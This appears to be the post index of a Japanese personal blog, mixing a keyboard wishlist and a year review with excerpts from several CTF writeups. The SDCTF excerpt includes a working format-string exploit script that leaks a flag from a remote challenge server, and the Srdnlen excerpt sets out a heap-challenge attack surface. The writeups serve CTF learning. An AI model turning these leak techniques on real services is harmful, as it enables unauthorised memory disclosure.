新しいキーボードが欲しい

新しいキーボードが欲しい まえがき 現在、自宅のPCで使っているAnne Pro 2に割と飽きてきて1、新しいキーボードを探している。 ただ、何かとこだわりが強いのでドンピシャなキーボードがなかなか見つからない。 一度要件を整理してみる。 キーボードに求める要件 気にしない(★☆☆☆☆) – 譲れない(★★★★★) の5段階評価でキーボードに求める要件を書き出してみる。 [★★★★★] US配列 記号が打ちやすい。比較的キーの数が少なくてすっきりしている。 [★★★★★] 独特なキー配置でない 独特なキー配置の自作キーボードになかなか手が出せない理由の一つ。 自分に最適化したタイピング体験ができるはずだが、研究するときにあらゆるマシンを触るので高度にカスタマイズされたキー配置に慣れてしまうと、一般的なキーボード配置が打ちづらくなる。 自作キーボードに限らずとも、例えばCapsLockの位置にCtrlを割り当てる配置とかも個人的には合わない。実体験として、他人のHHKB借りたときに虚無のCtrlを何回もスカした。 [★★★★★] テンキーなし 不便にならないレベルで不要なキーは削りたいので、必要なら外付けします2。実はAnne Pro 2が60%キーボードではじめはキー足りないと思っていたが、慣れれば全く気にならない。F1–F12も無くてもいい。 [★★★★☆] 黒軸 過去に青軸・茶軸・赤軸・静電容量のキーボードは一通り試した。 学部生の時に演習室で触った黒軸がかなり打ち心地がよかったので [★★★★☆] ポインティングスティック(トラックポイント) ゲーム以外の用途に関しては、ポインティングスティックで操作したい。マウスに持ち帰るのが面倒になってきた。 ただこれを最優先にすると一気に候補が限られてくる。 そもそも2017年にIBMの特許3 が切れたばかりらしく、新しい製品がそんなに出ていない? [★★☆☆☆] 無線・有線両対応 これは割とどっちでもいい。両対応していたらうれしいな、という感じ。 候補 上記の要件をもとに、インターネットを彷徨って出会ったキーボードたちがこちら。 TEX Yoda II TEX Yoda IIは上記の要件をほとんど満たしており、即買いレベルだが、なんと在庫がない… 入荷予定も特に書いておらず入手は難しそう、残念。 TEX Shura TEX Shuraも要件をほとんど満たしている。 Yoda IIを知らなかったら即買いしていたが、知っているがゆえに矢印キーの存在と外枠の太さが目立ってしまう。 Majestouch MINILA-R Convertible Majestouch MINILA-R Convertibleと上記2つの大きな違いはポインティングスティックの有無であり、これさえあれば完璧だった。 実は初めて買ったメカニカルキーボードがMajestouchで、かなり質が良く打ちやすい印象があるのでポインティングスティックなしでも購入検討したいレベル。 あとがき 現状一番欲しいのはYoda IIだが、在庫なしとのことで残りの2つのどちらかになりそう。 お願いだから買った直後に在庫復活とかしないでね。 ...

2024-10-03 · 1 min · 67 words · Laika

WaniCTF 2024 Writeup

WaniCTF 2024 Writeup Easy calc 1import os 2import random 3from hashlib import md5 4 5from Crypto.Cipher import AES 6from Crypto.Util.number import long_to_bytes, getPrime 7 8FLAG = os.getenvb(b"FLAG", b"FAKE{THIS_IS_NOT_THE_FLAG!!!!!!}") 9 10 11def encrypt(m: bytes, key: int) -> bytes: 12 iv = os.urandom(16) 13 key = long_to_bytes(key) 14 key = md5(key).digest() 15 cipher = AES.new(key, AES.MODE_CBC, iv=iv) 16 return iv + cipher.encrypt(m) 17 18 19def f(s, p): 20 u = 0 21 for i in range(p): 22 u += p - i 23 u *= s 24 u %= p 25 26 return u 27 28 29p = getPrime(1024) 30s = random.randint(1, p - 1) 31 32A = f(s, p) 33ciphertext = encrypt(FLAG, s).hex() 34 35 36print(f"{p = }") 37print(f"{A = }") 38print(f"{ciphertext = }") Flag が$s$の値を鍵として暗号化されています。 与えられた$A := f(s, p), p$の値から$s$を復元できないか考えてみます。 まず、$A = f(s, p)$の中身を式に起こしてみます。 $$ \begin{aligned} A = f(s, p) &= s(\dots( s(s(s(p-0)+(p-1))+(p-2)) + \dots + 2) + 1 \mod p \\ &= \sum_{i=0}^{p-1} s^{p-i}(p-i) \\ &= \sum_{i=1}^{p} s^{i}i \end{aligned} $$ ...

2024-06-22 · 6 min · 1165 words · Laika

2023年振り返り

はじめに 2023年の振り返りをします。 1月・2月 未踏の成果発表と修論発表に追われる日々でした。 応募したときには、修論はなんとかなるだろうと高を括っていた結果痛い目を見ました… 未踏の同期にM2はほとんど見かけなかった気がします。賢い。 後回し癖1は一生治らないと思っているので修論執筆は本当に大変でした。 LLMの進歩のおかげで英訳が簡単にできる時代で本当に良かったです。 3月 2月までであらゆる𝐵𝑖𝑔 𝐸𝑣𝑒𝑛𝑡が終わったので燃え尽き状態でした。 何をしていたか覚えていません… と思ったのですが、そういえば手元のWindowsPCが不調になっていたので自作PCを新たに作り直していました。 今まで使っていたのが高校生の時に組んだPC(Core i5, GTX 760)だったので、VALORANTですら動作が怪しいレベルのスペックでした。 久しぶりの大型PCアップデート(Core i7, RTX 3060 Ti)でかなり快適になりました。 やはり普段から使うものには金を惜しむべきではありませんね。 買っただけで全然やってないElden Ring もう1つ思い出しました。VCJのSplit1の決勝が大阪で開催されたので見に行きました。 ゲームの大会を現地で見るのは初めてでしたが、会場の一体感はやはり現地でしか味わえないものですね。 FENNEL 4月 D進しました。がんばるぞ~ 同時に生活費を稼ぐべく、某所でWeb開発のお手伝いを始めました。 5月 上旬にWaniCTF 2023を開催しました。 今回はCTFTimeにも掲載して多くの方にご参加いただきました。 public votingでも多くの高評価をいただきとてもありがたい… 高評価ありがとうございます 下旬にはTeam Enuの方々とDEFCON Qualifierに挑みました 2。 食事付き、宿泊施設付き、お菓子もジュースもたくさんある部屋でモニターも大量にあるという至れり尽くせりの環境でCTFを解ける最高の2日間でした。 しかし、問題にアプローチできる筋力が足りず特にreversing筋の不足を痛感しました。 このときyu1hpaさんにも初めてお会いしました。 9月 Wani Hackaseの長い歴史の中で初の合宿として、和歌山の白浜に行きました。 🐊は正式な大学のサークルではないので、普段から最低限の活動しかしていなかったのですが、5・6年目にしてようやくそれらしいことができました。 なるべくスケジュールが合う日程を選んだのですが、結果として涼しくなりはじめたちょうどよいタイミングでした。3 初回だったので講義は1つだけでしたが、hi120ki氏が懇切丁寧なQiling講座をしてくれました。 練習問題も多くついており、かなり充実した講義でした。 そのあとはバーベキューもして夏の最後に夏っぽいことができました。 BBQ 翌日はアドベンチャーワールドで🐼を見ました。 最後に動物園に行ったのが遥か昔だったので、ほとんど初動物園という感じで年甲斐もなく楽しみました。 🐼 それと人生で初めてゲーミングモニターを買いました。 中学生のころからFPSをしていましたが、初めて60Hzよりリフレッシュレートの高いモニターを買いました。 マウスを高速移動させるとカーソルが60Hzのときより3倍くらい多く分身していてビックリしました。 ゲーム中は確かにぬるぬるしている感じはあるのですが、言うほど成績が良くなるかというとそういうわけでもなく… 10月・11月 論文執筆→あれ?ここちょっとおかしいな?→再実験→論文執筆→… をしていて、それ以外の記憶がありません。 そういえば某所でリサーチアシスタントをすることになり、10月中旬ごろに面接を受けました。 12月 上旬はTsukuCTFに参加して優勝しました。賞品がいろいろあるらしく楽しみ。 OSINTは結構苦手意識があるのですが、サクサク解けて楽しかったです。 また、10月に面接を受けた某所でのリサーチアシスタントも始まり、新しい研究テーマに取り組み始めました。 先月の論文執筆中に思ったのですが、やはり研究初期の手探り状態がとても好きです。 下旬にはsouthball氏のお誘いで、思いがけずSECCON Finalに参加しました。 予選ラウンドがあるCTFで決勝オンサイトに行くのは初めてでした。 チームメイトがとても強く、ほかのジャンルも満遍なくフラグをとってくれていたため、 結果として国内3位を獲得できました。 チームメイトは全員初めての決勝オンサイトだったはずですが、とても良い結果が残せたと思います。 ...

2023-12-31 · 1 min · 115 words · Laika

SECCON CTF 2023 Final Writeup

はじめに 2023/12/23(土)- 2023/12/24(日)の2日間でSECCON CTF 2023の決勝戦が開催されました。 チーム southball 1 の4人で参加して国内3位でした🎉 思った以上の結果が出せて嬉しいです。 SECCON本戦に出場していました チームsouthballで国内3位でした! pic.twitter.com/CNyPbsQ2le — Laika (@ki4l_) December 24, 2023 チームメイトのwriteup Ciffelia: https://blog.ciffelia.com/article/seccon2023-finals southball: https://github.com/southball/ctf-writeups/tree/main/SECCON-CTF-2023-Final [Crypto] DLP 4.0 1import os 2import secrets 3import signal 4 5FLAG = os.getenv("FLAG", "FAKEFLAG{THIS_IS_FAKE}") 6 7 8if __name__ == "__main__": 9 signal.alarm(333) 10 p = int(input("What's your favorite 333-bit p: ")) 11 if not is_prime(p) or p.bit_length() != 333: 12 print("Invalid p") 13 exit() 14 order = p**2 - 1 15 x = secrets.randbelow(order) 16 Q = QuaternionAlgebra(Zmod(p), -1, -1) 17 g = Q.random_element() 18 h = g**x 19 print(f"{g = }") 20 print(f"{h = }") 21 _x = int(input("Guess x: ")) 22 if g**_x == h: 23 print(FLAG) 24 else: 25 print("NO FLAG") 問題は至ってシンプル。 333bitの素数$p$をサーバーへ送信する。 サーバー側で適当な$g \in \mathbb{H}_p$が選択される。 $g, g^x$が与えられるので、$x$を求める。 離散対数問題で、こちらが$p$を自由に決められる状況なので、Pohlig-Hellmanを真っ先に試しました。 ...

2023-12-29 · 9 min · 1864 words · Laika

TsukuCTF2023 Writeup

Wani HackaseでTsukuCTFに参加しました。 結果は1位でした。1 OSINTは普段面倒臭がって解かないんですが、これだけ出されると逆に解いてみたくなります。 とりあえず自分が関わった問題だけ書きます。 airport https://www.ana.co.jp/ja/jp/guide/inflight/service/domestic/dhc8-q400/ DHC8-Q400型機は、ANAグループ唯一のプロペラ機です。 らしいです。 就航していて割と町中にある空港を全部打ったら伊丹空港でした。 大阪に居るのに全然伊丹空港に行ったことがなく確信が持てませんでした。 fiction 最近強化されたGekkoくんの家です。2 3 これはVALORANTというゲームのマップで、sunsetというマップの一角です。 VALORANTはマップごとに緯度・経度みたいな設定があるので、それを調べて入力すると通ります。 VALORANTをやっている人にはラッキー問題です。 travel_with_tsukushi Air ArabiaとBatik AirとMalaysia Airlinesの機体がありますね。 Google Lens最強です。 Batik AirはBatik Air Malaysiaというのもあるらしいですが、関係性はよくわかりません。 とにかく国際便が多そうなので、これらの航空会社と関連性の高そうなマレーシアの大きい空港あたりっぽさそうです。 今回のOSINTはsubmitし放題なので投げてみると、クアラルンプール国際空港が該当しました。 TrainWindow 最近の写真は画質が良くて細部がよく見えます。 中央右寄りの黒い建物にTTCと書いてあるのでググります。 https://maps.app.goo.gl/XrMxi2vBWPyGv76T7 場所がそれっぽいですね。 あとは近くを走る線路上の画角が合う地点を探します。 grass_court テニスコートはほぼ情報がなく、画面中央を拡大すると見える謎のキャラクターと、左の木に隠れた電波天文台しか手掛かりがなく詰まっていました。 Ciffeliaが謎のキャラクターが奥州宇宙遊学館4のキャラクター「又三郎」であることを突き止めてくれたため、一気に解決しました。 どうやって見つけたんだろう。 sunset shioさんが何らかのイベント終了後に撮った写真から、場所ではなく時間を誤差1分で答える問題です。 しかも回答可能回数は3回。 無理じゃーんと思いましたが、場所さえ分かれば日没直前なのである程度の時刻はわかります。 とりあえずイベントを突き止めるためにshioさんのXを漁ります。 https://x.com/shio_sa1t/status/1698334659699192002 作問に追われていた時期がわかるので、だいたいこの直後あたりで作った問題な予感がします。(エスパー) 実際、上の示したポストの直後にセキュリティ・ミニキャンプ in 新潟 2023で講師をされていたことがわかります。 ここで写真を見返すと、西側の海の向こうに陸地が見えます。 新潟で撮影された写真であれば、西に佐渡島があるので、陸地が見えるのも頷けます。 新潟の写真であることにある程度確信が持てたところで、新潟の海岸あたりからそれっぽい場所を探します。 https://maps.app.goo.gl/ntPzN8f38J1MnsRh8 ...

2023-12-10 · 1 min · 87 words · Laika

SDCTF 2023 writeup

I participated SDCTF 2023 as Wani Hackase and took 5th place. Thank you for organizing nice CTF events! PWN/money-printer This binary contains a format string bug and the flag is located at stack. I just send %i$08lx to reveal the flag as shown below. 1from toyotama import * 2 3_r = Socket("nc money.sdc.tf 1337") 4_r.sendlineafter("want?\n", -1000) 5 6_r.sendlineafter("audience?\n", " ".join([f"%{i}$08lx" for i in range(10, 16)])) 7_r.recvuntil("said: ") 8flag = _r.recvline().decode().split() 9 10flag = b"".join([bytes.fromhex(x)[::-1] for x in flag]) 11flag += b"}" 12print(flag) sdctf{d4mn_y0u_f0unD_4_Cr4zY_4M0uN7_0f_M0n3y} MISC/Form bomb protector After connecting the server, it spawn a shell but we cannot use most commands since some syscall is prohibited. It accepts bash builtin commands, so I combined some of them to read the flag. ...

2023-05-11 · 11 min · 2315 words · Laika

RTACTF 2023 Writeup

RTACTF 2023にUZQueenで参加しました。1 起きたらちょうどRTACTFのpwnをやっていたので、布団でしばらく観戦したあとcryptoだけ参戦しました。 というか走っていた方々、手元を見られながらも解けるの本当にすごい ...

2023-03-21 · 2 min · 349 words · Laika

Wani HackaseのSlackにあるスラッシュコマンドの紹介

はじめに 本記事はCTF Advent Calendarの16日目の記事です。 昨日はkanonさんの「初心者がCTF始めるためにはどうすればいいのか(個人的偏見)」でした。 初めの解けない問題が多いうちはなかなか辛いですが、私もとにかく問題を解きまくっているときが一番成長を実感しますね。 今回は、Wani HackaseのSlackにある便利スラッシュコマンド(n=2)の紹介です。1 Wani Hackaseが設立したときに私は居なかったのですが、当時からSlackを使っていたようで今でもSlackを使っています。 チャンネル立てるのめんどくさい Wani Hackaseでは毎週のミーティングで、(だいたい週末にある)参加するCTFを適当に選んでいます。 私が参加登録をする係をしていて2、イベントごとに1つのSlackのチャンネル立てるのですが、これが結構めんどくさいです。 そこで、チャンネルを立てる作業を半自動化できるSlackのスラッシュコマンドを作って少し楽をしています。 次に実際のコマンドの動作の流れを紹介します。 スラッシュコマンド CTFtimeからイベントを取得する /event と、それ以外のイベント用の /custom_event があります。 /event CTFtimeからイベントを取得して、選んだイベントをもとにチャンネルを作ってくれます。 /event コマンドで起動します。 CTFtimeの直近10件くらいのUpcomingなイベントが表示されるので1つ選びます。 チャンネル名に使うイベント名の略称と、ログイン時に使用するID/PWを入力します。 PWはランダムな文字列を自動生成して最初から入力されているので、登録時にここからコピペもできます。(勿論ダミーです) submitすると #events チャンネルに、選択したイベントのチャンネルへのリンクが貼られます。 #2022_12_intent のように生成されたイベントチャンネルへのリンクを押すと、イベントの日時やリンク、ログイン情報などが投稿されたチャンネルへ飛びます。 日時は日本時間に合わせてあります。 /custom_event CTFtimeには掲載されていないイベント用のコマンドで、手動で入力したイベント情報をもとにチャンネルを作ってくれます。 Slackには時刻を入力できるフォームがあるのでやや便利です。 基本的に主催チームのタイムゾーン基準で開催時刻が記載されていて日本標準時への変換が面倒なことが多いので、タイムゾーンを指定することでそのまま日時を打てるようにしてあります。 /custom_event コマンドは全部手動で入力します。 CTFtime API /eventでCTFtimeのイベントを取得していますが、これにはCTFtimeのAPIを利用しています。 このページはリンクが見つけにくいので3そもそも存在に気づきにくいです。 丁寧なドキュメントがあるわけではないのでAPIが返すイベント情報によくわからないフィールドもありますが、適当にパースして雰囲気で使っています。 Discord版スラッシュコマンド Slackがフリープランの90日以前のメッセージ閲覧に制限をかけ始めたのでDiscordへの移行を見越してDiscord版のスラッシュコマンドも作っていました。 最近(?)のDiscordはモーダルウィンドウとかも出せるようになっているらしく、似たような物を作れると思っていたのですが、ドキュメントを読み解くのにかなり苦戦して途中で投げています…… やる気が再燃したら多分完成させると思います。 おわりに そんなに複雑なことをしている訳ではないのですが、かなり作業が楽になりました。 いっそ参加登録も自動化できたらいいなーとか考えていましたが、規格でもない限り無理なので諦めました…… 4 明日はArkさんが2022年のおもしろWeb問を紹介されるようです! 本当はExtended Hidden Number Problemの話を書きたかったのですが、師走は本当に忙しいので軽めの記事に落ち着きました ↩︎ いつの間にか参加登録マンになっていた ↩︎ そもそもメインのページからリンクが無いかもしれない? どうやって見つけたかも思い出せない🙃 ↩︎ 規格といえば、配布ファイル解凍時に「ファイルが散らばる」or「ディレクトリが出てくる」を定める規格があってもいいのにな~と常々思っています。 ↩︎

2022-12-16 · 1 min · 63 words · Laika

Srdnlen CTF 2022 Rat Pack

Srdnlen CTF 2022に参加していました。 解き損ねたpwnのRat Packという問題のメモです。 問題 典型的なheap問でよくある、メニューがあって操作ができるタイプの問題です。 書き方はかなりCっぽいですが、C++でコンパイルされています。 まずはGhidraとかで適当にreversingをしておきます。 rat構造体 この問題の中心となるratという構造体は以下のような構造になっています。(変数名は公式Writeup1で公開されているソースコードに準拠) 1struct rat { 2 struct rat** pack; // スタック上のstruct rat* packへのポインタ 3 void(*dialogue)(struct rat*); // base pointer 4 char name[16]; // ratの名前 5 int maxlen; // ratの名前の最大長 6} 7 8// |0|1|2|3|4|5|6|7|8|9|a|b|c|d|e|f| 9// +00h |pack-----------|dialogue-------| 10// +10h |name---------------------------| 11// +20h |maxlen---------| | 操作 この構造体に対して可能な操作は以下の通りです。ただし、packaddrはratを管理するサイズ16の配列です。 createRat() 1void createRat(struct rat** packaddr) { 2 // Allocate and initialize 3 struct rat* newRat = (struct rat*) malloc(sizeof(struct rat)); 4 newRat->maxlen = NAME_LEN; 5 newRat->dialogue = dialogue; 6 newRat->pack = packaddr; 7 name(newRat); 8 9 // Place rat in pack. 10 for (int i = 0; i < MAX_RATS; i++) { 11 if (packaddr[i] == NULL) { 12 packaddr[i] = newRat; 13 return; 14 } 15 } 16 printf("You ran out of rat space!\n"); 17 free(newRat); 18} sizeof(struct rat) = 0x28 のサイズの領域を確保(実際は0x30) これをnewRatとする。 newRatのメンバ変数を初期化し、name(newRat)で名前を設定 packaddrを先頭から走査し、空いている箇所にnewRatを設定 もし領域が空いていなければfree(newRat) greetRat() ...

2022-10-09 · 3 min · 564 words · Laika

Google Drive上のファイルをwget経由でダウンロードする方法

共有リンクが https://drive.google.com/file/d/${FILE_ID}/view?usp=sharing のとき、 1wget "https://drive.google.com/uc?export=download&id=${FILE_ID}&confirm=t" で直接ダウンロードできる。

2022-09-26 · 1 min · 6 words · Laika